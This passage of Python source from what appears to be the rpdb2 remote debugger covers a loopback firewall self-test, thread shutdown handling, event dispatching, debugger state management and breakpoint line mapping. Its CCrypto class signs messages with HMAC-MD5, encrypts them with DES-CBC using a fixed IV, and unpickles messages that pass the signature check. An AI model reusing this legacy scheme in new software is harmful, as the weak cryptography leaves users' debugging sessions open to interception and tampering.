skx = sort_key(x)
sky = sort_key(y)
return cmp(skx, sky)
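#
# recalc_sys_path() removes the entries that the old PYTHONPATH contributed
# to sys.path and inserts the entries of the current PYTHONPATH instead,
# normalized with my_abspath() and winlower().
#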
def recalc_sys_path(old_pythonpath):
opl = old_pythonpath.split(os.path.pathsep)
del sys.path[1: 1 + len(opl)]
pythonpath = os.environ.get('PYTHONPATH', '')
ppl = pythonpath.split(os.path.pathsep)
for i, p in enumerate(ppl):
abspath = my_abspath(p)
lowered = winlower(abspath)
sys.path.insert(1 + i, lowered)
def calc_signame(signum):
for k, v in vars(signal).items():
if not k.startswith('SIG') or k in ['SIG_IGN', 'SIG_DFL', 'SIGRTMIN', 'SIGRTMAX']:
continue
if v == signum:
return k
return '?'
#
# Similar to traceback.extract_stack() but fixes path with calc_frame_path()
#
def my_extract_stack(f):
if f == None:
return []
try:
g_traceback_lock.acquire()
_s = traceback.extract_stack(f)
finally:
g_traceback_lock.release()
_s.reverse()
s = []
for (p, ln, fn, text) in _s:
path = as_unicode(calc_frame_path(f), sys.getfilesystemencoding())
if text == None:
text = ''
s.append((path, ln, as_unicode(fn), as_unicode(text)))
f = f.f_back
if f == None:
break
s.reverse()
return s
#
# Similar to traceback.extract_tb() but fixes path with calc_frame_path()
#
def my_extract_tb(tb):
try:
g_traceback_lock.acquire()
_s = traceback.extract_tb(tb)
finally:
g_traceback_lock.release()
s = []
for (p, ln, fn, text) in _s:
path = as_unicode(calc_frame_path(tb.tb_frame), sys.getfilesystemencoding())
if text == None:
text = ''
s.append((path, ln, as_unicode(fn), as_unicode(text)))
tb = tb.tb_next
if tb == None:
break
return s
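#
# get_traceback() returns the traceback of the most recent exception for a
# frame: from the given ctx object's exc_info() on Python 3, from
# frame.f_exc_traceback on Python 2, or, failing that, from a frame local
# named 'traceback' if it has the attributes of a real traceback object.
#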
def get_traceback(frame, ctx):
if is_py3k():
if ctx.get_exc_info() != None:
return ctx.get_exc_info()[2]
else:
if frame.f_exc_traceback != None:
return frame.f_exc_traceback
locals = copy.copy(frame.f_locals)
if not 'traceback' in locals:
return None
tb = locals['traceback']
if dir(tb) == ['tb_frame', 'tb_lasti', 'tb_lineno', 'tb_next']:
return tb
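#
# CFirewallTest checks whether a local firewall blocks the debugger's
# sockets: it starts a small echo server on a port in the debugger's port
# range and a client that connects to it over the loopback interface. If
# either side fails to communicate within the timeout, the test fails.
#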
class CFirewallTest:
m_port = None
m_thread_server = None
m_thread_client = None
m_lock = threading.RLock()
def __init__(self, fremote = False, timeout = 4):
if fremote:
self.m_loopback = ''
else:
self.m_loopback = LOOPBACK
self.m_timeout = timeout
self.m_result = None
self.m_last_server_error = None
self.m_last_client_error = None
def run(self):
CFirewallTest.m_lock.acquire()
try:
#
# If either the server or the client is still alive after a timeout,
# it means it is blocked by a firewall. Return False.
#
server = CFirewallTest.m_thread_server
if server != None and thread_is_alive(server):
server.join(self.m_timeout * 1.5)
if thread_is_alive(server):
return False
client = CFirewallTest.m_thread_client
if client != None and thread_is_alive(client):
client.join(self.m_timeout * 1.5)
if thread_is_alive(client):
return False
CFirewallTest.m_port = None
self.m_result = None
t0 = time.time()
server = threading.Thread(target = self.__server)
server.start()
CFirewallTest.m_thread_server = server
#
# If the server exited or failed to set up after a timeout
# it means it was blocked by a firewall.
#
while CFirewallTest.m_port == None and thread_is_alive(server):
if time.time() - t0 > self.m_timeout * 1.5:
return False
time.sleep(0.1)
if not thread_is_alive(server):
return False
t0 = time.time()
client = threading.Thread(target = self.__client)
client.start()
CFirewallTest.m_thread_client = client
while self.m_result == None and thread_is_alive(client):
if time.time() - t0 > self.m_timeout * 1.5:
return False
time.sleep(0.1)
return self.m_result
finally:
CFirewallTest.m_lock.release()
def __client(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.m_timeout)
try:
try:
s.connect((LOOPBACK, CFirewallTest.m_port))
s.send(as_bytes('Hello, world'))
data = self.__recv(s, 1024)
self.m_result = True
except socket.error:
e = sys.exc_info()[1]
self.m_last_client_error = e
self.m_result = False
finally:
s.close()
def __server(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.m_timeout)
if os.name == POSIX:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = SERVER_PORT_RANGE_START
while True:
try:
s.bind((self.m_loopback, port))
break
except socket.error:
e = sys.exc_info()[1]
if self.__GetSocketError(e) != errno.EADDRINUSE:
self.m_last_server_error = e
s.close()
return
if port >= SERVER_PORT_RANGE_START + SERVER_PORT_RANGE_LENGTH - 1:
self.m_last_server_error = e
s.close()
return
port += 1
CFirewallTest.m_port = port
try:
try:
conn = None
s.listen(1)
conn, addr = s.accept()
while True:
data = self.__recv(conn, 1024)
if not data:
return
conn.send(data)
except socket.error:
e = sys.exc_info()[1]
self.m_last_server_error = e
finally:
if conn != None:
conn.close()
s.close()
def __recv(self, s, len):
t0 = time.time()
while True:
try:
data = s.recv(1024)
return data
except socket.error:
e = sys.exc_info()[1]
if self.__GetSocketError(e) != errno.EWOULDBLOCK:
print_debug('socket error was caught, %s' % repr(e))
raise
if time.time() - t0 > self.m_timeout:
raise
continue
def __GetSocketError(self, e):
if (not isinstance(e.args, tuple)) or (len(e.args) == 0):
return -1
return e.args[0]
#
# ---------------------------------- CThread ---------------------------------------
#
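#
# CThread keeps weak references to all debugger threads so that joinAll()
# can call their shutdown callbacks and wait for them to exit when the
# debugger shuts down. Tracing and profiling are disabled in run() so
# debugger worker threads do not trace themselves.
#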
class CThread (threading.Thread):
m_fstop = False
m_threads = {}
m_lock = threading.RLock()
m_id = 0
def __init__(self, name = None, target = None, args = (), shutdown = None):
threading.Thread.__init__(self, name = name, target = target, args = args)
self.m_fstarted = False
self.m_shutdown_callback = shutdown
self.m_id = self.__getId()
def __del__(self):
#print_debug('Destructor called for ' + thread_get_name(self))
#threading.Thread.__del__(self)
if self.m_fstarted:
try:
del CThread.m_threads[self.m_id]
except KeyError:
pass
def start(self):
if CThread.m_fstop:
return
CThread.m_threads[self.m_id] = weakref.ref(self)
if CThread.m_fstop:
del CThread.m_threads[self.m_id]
return
self.m_fstarted = True
threading.Thread.start(self)
def run(self):
sys.settrace(None)
sys.setprofile(None)
threading.Thread.run(self)
def join(self, timeout = None):
try:
threading.Thread.join(self, timeout)
except AssertionError:
pass
def shutdown(self):
if self.m_shutdown_callback:
self.m_shutdown_callback()
def joinAll(cls):
print_debug('Shutting down debugger threads...')
CThread.m_fstop = True
for tid, w in list(CThread.m_threads.items()):
t = w()
if not t:
continue
try:
#print_debug('Calling shutdown of thread %s.' % thread_get_name(t))
t.shutdown()
except:
pass
t = None
t0 = time.time()
while len(CThread.m_threads) > 0:
if time.time() - t0 > SHUTDOWN_TIMEOUT:
print_debug('Shut down of debugger threads has TIMED OUT!')
return
#print_debug(repr(CThread.m_threads))
time.sleep(0.1)
print_debug('Shut down debugger threads, done.')
joinAll = classmethod(joinAll)
def clearJoin(cls):
CThread.m_fstop = False
clearJoin = classmethod(clearJoin)
def __getId(self):
CThread.m_lock.acquire()
id = CThread.m_id
CThread.m_id += 1
CThread.m_lock.release()
return id
#
#--------------------------------------- Crypto ---------------------------------------
#
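#
# CCrypto signs each message with an HMAC-MD5 over a pickle of
# (anchor, index, rid, args) and can optionally encrypt it with DES-CBC
# using a key derived from the password. The monotonically increasing
# index, combined with a random anchor chosen by the receiving side, is
# used to reject replayed messages.
#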
class CCrypto:
"""
Handle authentication and encryption of data, using password protection.
"""
m_keys = {}
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, rid):
assert(is_unicode(_rpdb2_pwd))
assert(is_unicode(rid))
self.m_rpdb2_pwd = _rpdb2_pwd
self.m_key = self.__calc_key(_rpdb2_pwd)
self.m_fAllowUnencrypted = fAllowUnencrypted
self.m_rid = rid
self.m_failure_lock = threading.RLock()
self.m_lock = threading.RLock()
self.m_index_anchor_in = random.randint(0, 1000000000)
self.m_index_anchor_ex = 0
self.m_index = 0
self.m_index_table = {}
self.m_index_table_size = INDEX_TABLE_SIZE
self.m_max_index = 0
def __calc_key(self, _rpdb2_pwd):
"""
Create and return a key from a password.
A weak password means a weak key.
"""
if _rpdb2_pwd in CCrypto.m_keys:
return CCrypto.m_keys[_rpdb2_pwd]
key = as_bytes(_rpdb2_pwd)
suffix = key[:16]
d = hmac.new(key, digestmod = _md5)
#
# The following loop takes around a second to complete
# and should strengthen the password by ~12 bits.
# A good password is ~30 bits strong, so we are looking
# at a ~42 bit strong key.
#
for i in range(2 ** 12):
d.update((key + suffix) * 16)
key = d.digest()
CCrypto.m_keys[_rpdb2_pwd] = key
return key
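#
# Illustrative sketch (kept as a comment so it does not execute at import
# time): the iterated-HMAC key-strengthening idea used by __calc_key()
# above, written as a standalone function. The function name and the
# 'password' argument are hypothetical; hashlib.md5 stands in for the
# module's _md5 alias.
#
# import hmac
# import hashlib
#
# def strengthen_key(password, rounds = 2 ** 12):
#     key = password.encode('utf-8')
#     suffix = key[:16]
#     d = hmac.new(key, digestmod = hashlib.md5)
#     for i in range(rounds):
#         # Each round feeds the previous key back into the running HMAC.
#         d.update((key + suffix) * 16)
#         key = d.digest()
#     return key
#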
def set_index(self, i, anchor):
try:
self.m_lock.acquire()
self.m_index = i
self.m_index_anchor_ex = anchor
finally:
self.m_lock.release()
def get_max_index(self):
return self.m_max_index
def do_crypto(self, args, fencrypt):
"""
Sign args and possibly encrypt.
Return signed/encrypted string.
"""
if not fencrypt and not self.m_fAllowUnencrypted:
raise EncryptionExpected
if fencrypt and not is_encryption_supported():
raise EncryptionNotSupported
(digest, s) = self.__sign(args)
fcompress = False
if len(s) > 50000:
_s = zlib.compress(s)
if len(_s) < len(s) * 0.4:
s = _s
fcompress = True
if fencrypt:
s = self.__encrypt(s)
s = base64.encodestring(s)
u = as_unicode(s)
return (fcompress, digest, u)
def undo_crypto(self, fencrypt, fcompress, digest, msg, fVerifyIndex = True):
"""
Take a crypto string, verify its signature, and decrypt it if
needed.
"""
if not fencrypt and not self.m_fAllowUnencrypted:
raise EncryptionExpected
if fencrypt and not is_encryption_supported():
raise EncryptionNotSupported
s = as_bytes(msg)
s = base64.decodestring(s)
if fencrypt:
s = self.__decrypt(s)
if fcompress:
s = zlib.decompress(s)
args, id = self.__verify_signature(digest, s, fVerifyIndex)
return (args, id)
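#
# Illustrative round-trip sketch for do_crypto()/undo_crypto() (kept as a
# comment so it does not execute at import time, and assuming the module's
# crypto dependencies are available). A single instance can verify its own
# output when index verification is disabled; the names 'crypto' and 'args'
# are hypothetical.
#
# crypto = CCrypto(as_unicode('secret'), fAllowUnencrypted = True, rid = as_unicode('1'))
# (fcompress, digest, msg) = crypto.do_crypto(args = ['ping'], fencrypt = False)
# (args, rid) = crypto.undo_crypto(False, fcompress, digest, msg, fVerifyIndex = False)
#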
def __encrypt(self, s):
s_padded = s + as_bytes('\x00') * (DES.block_size - (len(s) % DES.block_size))
key_padded = (self.m_key + as_bytes('0') * (DES.key_size - (len(self.m_key) % DES.key_size)))[:DES.key_size]
iv = '0' * DES.block_size
d = DES.new(key_padded, DES.MODE_CBC, iv)
r = d.encrypt(s_padded)
return r
def __decrypt(self, s):
try:
key_padded = (self.m_key + as_bytes('0') * (DES.key_size - (len(self.m_key) % DES.key_size)))[:DES.key_size]
iv = '0' * DES.block_size
d = DES.new(key_padded, DES.MODE_CBC, iv)
_s = d.decrypt(s).strip(as_bytes('\x00'))
return _s
except:
self.__wait_a_little()
raise DecryptionFailure
def __sign(self, args):
i = self.__get_next_index()
pack = (self.m_index_anchor_ex, i, self.m_rid, args)
#print_debug('***** 1' + repr(args)[:50])
s = pickle.dumps(pack, 2)
#print_debug('***** 2' + repr(args)[:50])
h = hmac.new(self.m_key, s, digestmod = _md5)
d = h.hexdigest()
#if 'coding:' in s:
# print_debug('%s, %s, %s\n\n==========\n\n%s' % (len(s), d, repr(args), repr(s)))
return (d, s)
def __get_next_index(self):
try:
self.m_lock.acquire()
self.m_index += 1
return self.m_index
finally:
self.m_lock.release()
def __verify_signature(self, digest, s, fVerifyIndex):
try:
h = hmac.new(self.m_key, s, digestmod = _md5)
d = h.hexdigest()
#if 'coding:' in s:
# print_debug('%s, %s, %s, %s' % (len(s), digest, d, repr(s)))
if d != digest:
self.__wait_a_little()
raise AuthenticationFailure
pack = pickle.loads(s)
(anchor, i, id, args) = pack
except AuthenticationFailure:
raise
except:
print_debug_exception()
self.__wait_a_little()
raise AuthenticationBadData
if fVerifyIndex:
self.__verify_index(anchor, i, id)
return args, id
def __verify_index(self, anchor, i, id):
"""
Manage message ids to prevent replay of old messages.
"""
try:
try:
self.m_lock.acquire()
if anchor != self.m_index_anchor_in:
raise AuthenticationBadIndex(self.m_max_index, self.m_index_anchor_in)
if i > self.m_max_index + INDEX_TABLE_SIZE // 2:
raise AuthenticationBadIndex(self.m_max_index, self.m_index_anchor_in)
i_mod = i % INDEX_TABLE_SIZE
(iv, idl) = self.m_index_table.get(i_mod, (None, None))
#print >> sys.__stderr__, i, i_mod, iv, self.m_max_index
if (iv is None) or (i > iv):
idl = [id]
elif (iv == i) and (not id in idl):
idl.append(id)
else:
raise AuthenticationBadIndex(self.m_max_index, self.m_index_anchor_in)
self.m_index_table[i_mod] = (i, idl)
if i > self.m_max_index:
self.m_max_index = i
return self.m_index
finally:
self.m_lock.release()
except:
self.__wait_a_little()
raise
def __wait_a_little(self):
self.m_failure_lock.acquire()
time.sleep((1.0 + random.random()) / 2)
self.m_failure_lock.release()
#
# --------------------------------- Events List --------------------------
#
class CEvent(object):
"""
Base class for events.
"""
def __reduce__(self):
rv = (copy_reg.__newobj__, (type(self), ), vars(self), None, None)
return rv
def is_match(self, arg):
pass
class CEventNull(CEvent):
"""
Sent to release event listeners (Internal, speeds up shutdown).
"""
pass
class CEventEmbeddedSync(CEvent):
"""
Sent when an embedded interpreter becomes active, so it can
determine whether there are pending break requests. (Internal)
"""
pass
class CEventClearSourceCache(CEvent):
"""
Sent when the source cache is cleared.
"""
pass
class CEventSignalIntercepted(CEvent):
"""
This event is sent when a signal is intercepted inside tracing code.
Such signals are held pending until the tracing code returns.
"""
def __init__(self, signum):
self.m_signum = signum
self.m_signame = calc_signame(signum)
class CEventSignalException(CEvent):
"""
This event is sent when the handler of a previously intercepted signal
raises an exception. Such exceptions are ignored because of technical
limitations.
"""
def __init__(self, signum, description):
self.m_signum = signum
self.m_signame = calc_signame(signum)
self.m_description = description
class CEventEncoding(CEvent):
"""
The encoding has been set.
"""
def __init__(self, encoding, fraw):
self.m_encoding = encoding
self.m_fraw = fraw
class CEventPsycoWarning(CEvent):
"""
The psyco module was detected. rpdb2 is incompatible with this module.
"""
pass
class CEventConflictingModules(CEvent):
"""
Conflicting modules were detected. rpdb2 is incompatible with these modules.
"""
def __init__(self, modules_list):
self.m_modules_list = modules_list
class CEventSyncReceivers(CEvent):
"""
A base class for events that need to be received by all listeners at
the same time. The synchronization mechanism is internal to rpdb2.
"""
def __init__(self, sync_n):
self.m_sync_n = sync_n
class CEventForkSwitch(CEventSyncReceivers):
"""
Debuggee is about to fork. Try to reconnect.
"""
pass
class CEventExecSwitch(CEventSyncReceivers):
"""
Debuggee is about to exec. Try to reconnect.
"""
pass
class CEventExit(CEvent):
"""
Debuggee is terminating.
"""
pass
class CEventState(CEvent):
"""
State of the debugger.
Value of m_state can be one of the STATE_* globals.
"""
def __init__(self, state):
self.m_state = as_unicode(state)
def is_match(self, arg):
return self.m_state == as_unicode(arg)
class CEventSynchronicity(CEvent):
"""
Mode of synchronicity.
Sent when mode changes.
"""
def __init__(self, fsynchronicity):
self.m_fsynchronicity = fsynchronicity
def is_match(self, arg):
return self.m_fsynchronicity == arg
class CEventTrap(CEvent):
"""
Mode of "trap unhandled exceptions".
Sent when the mode changes.
"""
def __init__(self, ftrap):
self.m_ftrap = ftrap
def is_match(self, arg):
return self.m_ftrap == arg
class CEventForkMode(CEvent):
"""
Mode of fork behavior has changed.
Sent when the mode changes.
"""
def __init__(self, ffork_into_child, ffork_auto):
self.m_ffork_into_child = ffork_into_child
self.m_ffork_auto = ffork_auto
class CEventUnhandledException(CEvent):
"""
Unhandled Exception
Sent when an unhandled exception is caught.
"""
class CEventNamespace(CEvent):
"""
Namespace has changed.
This tells the debugger it should query the namespace again.
"""
pass
class CEventNoThreads(CEvent):
"""
No threads to debug.
Debuggee notifies the debugger that it has no threads. This can
happen in embedded debugging and in a Python interpreter session.
"""
pass
class CEventThreads(CEvent):
"""
State of threads.
"""
def __init__(self, _current_thread, thread_list):
self.m_current_thread = _current_thread
self.m_thread_list = thread_list
class CEventThreadBroken(CEvent):
"""
A thread has broken.
"""
def __init__(self, tid, name):
self.m_tid = tid
self.m_name = as_unicode(name)
class CEventStack(CEvent):
"""
Stack of current thread.
"""
def __init__(self, stack):
self.m_stack = stack
class CEventStackFrameChange(CEvent):
"""
Stack frame has changed.
This event is sent when the debugger goes up or down the stack.
"""
def __init__(self, frame_index):
self.m_frame_index = frame_index
class CEventStackDepth(CEvent):
"""
Stack depth has changed.
"""
def __init__(self, stack_depth, stack_depth_exception):
self.m_stack_depth = stack_depth
self.m_stack_depth_exception = stack_depth_exception
class CEventBreakpoint(CEvent):
"""
A breakpoint or breakpoints changed.
"""
DISABLE = as_unicode('disable')
ENABLE = as_unicode('enable')
REMOVE = as_unicode('remove')
SET = as_unicode('set')
def __init__(self, bp, action = SET, id_list = [], fAll = False):
self.m_bp = breakpoint_copy(bp)
self.m_action = action
self.m_id_list = id_list
self.m_fAll = fAll
class CEventSync(CEvent):
"""
Internal (not sent to the debugger) event that triggers the
firing of other events that help the debugger synchronize with
the state of the debuggee.
"""
def __init__(self, fException, fSendUnhandled):
self.m_fException = fException
self.m_fSendUnhandled = fSendUnhandled
#
# --------------------------------- Event Manager --------------------------
#
class CEventDispatcherRecord:
"""
Internal structure that binds a callback to particular events.
"""
def __init__(self, callback, event_type_dict, fSingleUse):
self.m_callback = callback
self.m_event_type_dict = copy.copy(event_type_dict)
self.m_fSingleUse = fSingleUse
def is_match(self, event):
rtl = [t for t in self.m_event_type_dict.keys() if isinstance(event, t)]
if len(rtl) == 0:
return False
#
# Examine first match only.
#
rt = rtl[0]
rte = self.m_event_type_dict[rt].get(EVENT_EXCLUDE, [])
if len(rte) != 0:
for e in rte:
if event.is_match(e):
return False
return True
rte = self.m_event_type_dict[rt].get(EVENT_INCLUDE, [])
if len(rte) != 0:
for e in rte:
if event.is_match(e):
return True
return False
return True
class CEventDispatcher:
"""
Events dispatcher.
Dispatchers can be chained together.
"""
def __init__(self, chained_event_dispatcher = None):
self.m_chained_event_dispatcher = chained_event_dispatcher
self.m_chain_override_types = {}
self.m_registrants = {}
def shutdown(self):
for er in list(self.m_registrants.keys()):
self.__remove_dispatcher_record(er)
def register_callback(self, callback, event_type_dict, fSingleUse):
er = CEventDispatcherRecord(callback, event_type_dict, fSingleUse)
#
# If we have a chained dispatcher, register the callback on the
# chained dispatcher as well.
#
if self.m_chained_event_dispatcher is not None:
_er = self.__register_callback_on_chain(er, event_type_dict, fSingleUse)
self.m_registrants[er] = _er
return er
self.m_registrants[er] = True
return er
def remove_callback(self, callback):
erl = [er for er in list(self.m_registrants.keys()) if er.m_callback == callback]
for er in erl:
self.__remove_dispatcher_record(er)
def fire_events(self, event_list):
for event in event_list:
self.fire_event(event)
def fire_event(self, event):
for er in list(self.m_registrants.keys()):
self.__fire_er(event, er)
def __fire_er(self, event, er):
if not er.is_match(event):
return
try:
er.m_callback(event)
except:
pass
if not er.m_fSingleUse:
return
try:
del self.m_registrants[er]
except KeyError:
pass
def register_chain_override(self, event_type_dict):
"""
Chain override prevents registration on chained
dispatchers for specific event types.
"""
for t in list(event_type_dict.keys()):
self.m_chain_override_types[t] = True
def __register_callback_on_chain(self, er, event_type_dict, fSingleUse):
_event_type_dict = copy.copy(event_type_dict)
for t in self.m_chain_override_types:
if t in _event_type_dict:
del _event_type_dict[t]
if len(_event_type_dict) == 0:
return False
def callback(event, er = er):
self.__fire_er(event, er)
_er = self.m_chained_event_dispatcher.register_callback(callback, _event_type_dict, fSingleUse)
return _er
def __remove_dispatcher_record(self, er):
try:
if self.m_chained_event_dispatcher is not None:
_er = self.m_registrants[er]
if _er != False:
self.m_chained_event_dispatcher.__remove_dispatcher_record(_er)
del self.m_registrants[er]
except KeyError:
pass
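#
# Illustrative usage sketch for CEventDispatcher (kept as a comment so it
# does not execute at import time). The callback below is hypothetical;
# EVENT_INCLUDE is the module-level filter key consulted by
# CEventDispatcherRecord.is_match() above.
#
# dispatcher = CEventDispatcher()
#
# def on_break(event):
#     print_debug('Debugger state changed to: %s' % event.m_state)
#
# event_type_dict = {CEventState: {EVENT_INCLUDE: [STATE_BROKEN]}}
# dispatcher.register_callback(on_break, event_type_dict, fSingleUse = False)
# dispatcher.fire_event(CEventState(STATE_BROKEN))
#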
class CEventQueue:
"""
Add queue semantics above an event dispatcher.
Instead of firing event callbacks, new events are returned in a list
upon request.
"""
def __init__(self, event_dispatcher, max_event_list_length = MAX_EVENT_LIST_LENGTH):
self.m_event_dispatcher = event_dispatcher
self.m_event_lock = threading.Condition()
self.m_max_event_list_length = max_event_list_length
self.m_event_list = []
self.m_event_index = 0
self.m_n_waiters = []
def shutdown(self):
self.m_event_dispatcher.remove_callback(self.event_handler)
def register_event_types(self, event_type_dict):
self.m_event_dispatcher.register_callback(self.event_handler, event_type_dict, fSingleUse = False)
def event_handler(self, event):
try:
self.m_event_lock.acquire()
if isinstance(event, CEventSyncReceivers):
t0 = time.time()
while len(self.m_n_waiters) < event.m_sync_n and time.time() < t0 + HEARTBEAT_TIMEOUT:
time.sleep(0.1)
self.m_event_list.append(event)
if len(self.m_event_list) > self.m_max_event_list_length:
self.m_event_list.pop(0)
self.m_event_index += 1
lock_notify_all(self.m_event_lock)
finally:
self.m_event_lock.release()
def get_event_index(self):
return self.m_event_index
def wait_for_event(self, timeout, event_index):
"""
Return the new events which were fired.
"""
try:
self.m_n_waiters.append(0)
self.m_event_lock.acquire()
if event_index >= self.m_event_index:
safe_wait(self.m_event_lock, timeout)
if event_index >= self.m_event_index:
return (self.m_event_index, [])
sub_event_list = self.m_event_list[event_index - self.m_event_index:]
return (self.m_event_index, sub_event_list)
finally:
self.m_n_waiters.pop()
self.m_event_lock.release()
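#
# Illustrative polling sketch for CEventQueue (kept as a comment so it does
# not execute at import time). A client typically registers the event types
# it cares about and then repeatedly asks for events newer than the last
# index it saw; 'dispatcher' is a hypothetical CEventDispatcher instance.
#
# event_queue = CEventQueue(dispatcher)
# event_queue.register_event_types({CEventState: {}})
#
# index = event_queue.get_event_index()
# while True:
#     (index, events) = event_queue.wait_for_event(timeout = 1.0, event_index = index)
#     for event in events:
#         print_debug('New event: %s' % repr(event))
#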
class CStateManager:
"""
Manage possible debugger states (broken, running, etc...)
The state manager can receive state changes via an input event
dispatcher or via the set_state() method.
It sends state changes forward to the output event dispatcher.
The state can also be queried or waited for.
"""
def __init__(self, initial_state, event_dispatcher_output = None, event_dispatcher_input = None):
self.m_event_dispatcher_input = event_dispatcher_input
self.m_event_dispatcher_output = event_dispatcher_output
if self.m_event_dispatcher_input is not None:
event_type_dict = {CEventState: {}}
self.m_event_dispatcher_input.register_callback(self.event_handler, event_type_dict, fSingleUse = False)
if self.m_event_dispatcher_output is not None:
self.m_event_dispatcher_output.register_chain_override(event_type_dict)
self.m_state_lock = threading.Condition()
self.m_state_queue = []
self.m_state_index = 0
self.m_waiter_list = {}
self.set_state(initial_state)
def shutdown(self):
if self.m_event_dispatcher_input is not None:
self.m_event_dispatcher_input.remove_callback(self.event_handler)
def event_handler(self, event):
self.set_state(event.m_state)
def get_state(self):
return self.m_state_queue[-1]
def __add_state(self, state):
self.m_state_queue.append(state)
self.m_state_index += 1
self.__remove_states()
def __remove_states(self, treshold = None):
"""
Clean up old state changes from the state queue.
"""
index = self.__calc_min_index()
if (treshold is not None) and (index <= treshold):
return
_delta = 1 + self.m_state_index - index
self.m_state_queue = self.m_state_queue[-_delta:]
def __calc_min_index(self):
"""
Calc the minimum state index.
The calculated index is the oldest state that all state
waiters are aware of. That is, no one cares about older states
and these can be removed from the state queue.
"""
if len(self.m_waiter_list) == 0:
return self.m_state_index
index_list = list(self.m_waiter_list.keys())
min_index = min(index_list)
return min_index
def __add_waiter(self):
index = self.m_state_index
n = self.m_waiter_list.get(index, 0)
self.m_waiter_list[index] = n + 1
return index
def __remove_waiter(self, index):
n = self.m_waiter_list[index]
if n == 1:
del self.m_waiter_list[index]
self.__remove_states(index)
else:
self.m_waiter_list[index] = n - 1
def __get_states(self, index):
_delta = 1 + self.m_state_index - index
states = self.m_state_queue[-_delta:]
return states
def set_state(self, state = None, fLock = True):
try:
if fLock:
self.m_state_lock.acquire()
if state is None:
state = self.get_state()
self.__add_state(state)
lock_notify_all(self.m_state_lock)
finally:
if fLock:
self.m_state_lock.release()
if self.m_event_dispatcher_output is not None:
event = CEventState(state)
self.m_event_dispatcher_output.fire_event(event)
def wait_for_state(self, state_list):
"""
Wait for any of the states in the state list.
"""
try:
self.m_state_lock.acquire()
if self.get_state() in state_list:
return self.get_state()
while True:
index = self.__add_waiter()
alertable_wait(self.m_state_lock, PING_TIMEOUT)
states = self.__get_states(index)
self.__remove_waiter(index)
for state in states:
if state in state_list:
return state
finally:
self.m_state_lock.release()
def acquire(self):
self.m_state_lock.acquire()
def release(self):
self.m_state_lock.release()
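#
# Illustrative sketch for CStateManager (kept as a comment so it does not
# execute at import time): states can be pushed with set_state() or arrive
# as CEventState events on the input dispatcher, and wait_for_state()
# blocks until one of the requested states is reached.
#
# state_manager = CStateManager(STATE_RUNNING)
# state_manager.set_state(STATE_BROKEN)
# state = state_manager.wait_for_state([STATE_BROKEN])
#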
#
# -------------------------------------- Break Info manager ---------------------------------------
#
def myord(c):
try:
return ord(c)
except:
return c
def CalcValidLines(code):
l = code.co_firstlineno
vl = [l]
bl = [myord(c) for c in code.co_lnotab[2::2]]
sl = [myord(c) for c in code.co_lnotab[1::2]]
for (bi, si) in zip(bl, sl):
l += si
if bi == 0:
continue
if l != vl[-1]:
vl.append(l)
if len(sl) > 0:
l += sl[-1]
if l != vl[-1]:
vl.append(l)
return vl
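#
# Illustrative sketch for CalcValidLines() (kept as a comment so it does not
# execute at import time): it walks co_lnotab to recover the line numbers a
# code object can actually stop on. co_lnotab is what this Python 2 era code
# relies on; newer CPython versions expose co_lines() instead. The function
# 'sample' is hypothetical.
#
# def sample(x):
#     y = x + 1
#     return y
#
# print_debug('Valid lines: %s' % CalcValidLines(sample.__code__))
#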
class CScopeBreakInfo:
def __init__(self, fqn, valid_lines):
self.m_fqn = fqn
self.m_first_line = valid_lines[0]
self.m_last_line = valid_lines[-1]
self.m_valid_lines = valid_lines
def CalcScopeLine(self, lineno):
rvl = copy.copy(self.m_valid_lines)
rvl.reverse()
for l in rvl:
if lineno >= l:
break
return l
def __str__(self):
return "('" + self.m_fqn + "', " + str(self.m_valid_lines) + ')'
class CFileBreakInfo:
"""
Break info structure for a source file.
"""
def __init__(self, filename):
self.m_filename = filename
self.m_first_line = 0
self.m_last_line = 0
self.m_scope_break_info = []
def CalcBreakInfo(self):
(source, encoding) = get_source(self.m_filename)
_source = as_string(source + as_unicode('\n'), encoding)
code = compile(_source, self.m_filename, "exec")
self.m_scope_break_info = []
self.m_first_line = code.co_firstlineno
self.m_last_line = 0
fqn = []
t = [code]
while len(t) > 0:
c = t.pop(0)
if type(c) == tuple:
self.m_scope_break_info.append(CScopeBreakInfo(*c))
fqn.pop()
continue
fqn = fqn + [c.co_name]
valid_lines = CalcValidLines(c)
self.m_last_line = max(self.m_last_line, valid_lines[-1])
_fqn = as_unicode('.'.join(fqn), encoding)
si = (_fqn, valid_lines)
subcodeslist = self.__CalcSubCodesList(c)
t = subcodeslist + [si] + t
def __CalcSubCodesList(self, code):
tc = type(code)
t = [(c.co_firstlineno, c) for c in code.co_consts if type(c) == tc]
t.sort()
scl = [c[1] for c in t]
return scl
def FindScopeByLineno(self, lineno):
lineno = max(min(lineno, self.m_last_line), self.m_first_line)
smaller_element = None
exact_element = None
for sbi in self.m_scope_break_info:
if lineno > sbi.m_last_line:
if (smaller_element is None) or (sbi.m_last_line >= smaller_element.m_last_line):
smaller_element = sbi
continue
if (lineno >= sbi.m_first_line) and (lineno <= sbi.m_last_line):
exact_element = sbi
break
assert(exact_element is not None)
scope = exact_element
l = exact_element.CalcScopeLine(lineno)
if (smaller_element is not None) and (l <= smaller_element.m_last_line):
scope = smaller_element
l = smaller_element.CalcScopeLine(lineno)
return (scope, l)
def FindScopeByName(self, name, offset):
if name.startswith(MODULE_SCOPE):
alt_scope = MODULE_SCOPE2 + name[len(MODULE_SCOPE):]
elif name.startswith(MODULE_SCOPE2):
alt_scope = MODULE_SCOPE + name[len(MODULE_SCOPE2):]
else:
return self.FindScopeByName(MODULE_SCOPE2 + SCOPE_SEP + name, offset)
for sbi in self.m_scope_break_info:
if sbi.m_fqn in [name, alt_scope]:
l = sbi.CalcScopeLine(sbi.m_first_line + offset)
return (sbi, l)
print_debug('Invalid scope: %s' % repr(name))
raise InvalidScopeName
class CBreakInfoManager:
"""
Manage break info dictionary per filename.
"""
def __init__(self):
self.m_file_info_dic = {}
def addFile(self, filename):
mbi = CFileBreakInfo(filename)
mbi.CalcBreakInfo()
self.m_file_info_dic[filename] = mbi
def getFile(self, filename):
if not filename in self.m_file_info_dic:
self.addFile(filename)
return self.m_file_info_dic[filename]
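#
# Illustrative sketch for the break-info classes (kept as a comment so it
# does not execute at import time): mapping a requested breakpoint line to
# its enclosing scope and nearest valid line. The file path below is a
# hypothetical placeholder and must point to readable source.
#
# manager = CBreakInfoManager()
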